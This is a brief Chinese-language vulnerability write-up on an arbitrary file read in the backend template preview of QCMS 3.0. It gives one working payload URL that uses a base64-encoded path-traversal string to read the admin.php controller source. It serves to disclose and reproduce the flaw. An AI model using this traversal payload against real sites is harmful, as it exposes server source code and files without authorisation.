QCMS 3.0 任意文件读取

QCMS 3.0 任意文件读取
=====================

一、漏洞简介
————

二、漏洞影响
————

QCMS 3.0

三、复现过程
————

用seay扫了一下后发现的漏洞

漏洞在后台模板代码预览处,构造payload例如

http://www.0-sec.org/backend/template/tempview/Li4vLi4vLi4vQ29udHJvbGxlci9hZG1pbi5waHA=.html

即可读取Controller文件下admin.php文件源码

![img](/static/yougar/Web安全/QCMS/resource/QCMS3.0任意文件读取/media/rId24.png)

跟源码对比下,确实是读到了

![img](/static/yougar/Web安全/QCMS/resource/QCMS3.0任意文件读取/media/rId25.png)

参考链接
——–

> https://xz.aliyun.com/t/7269

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容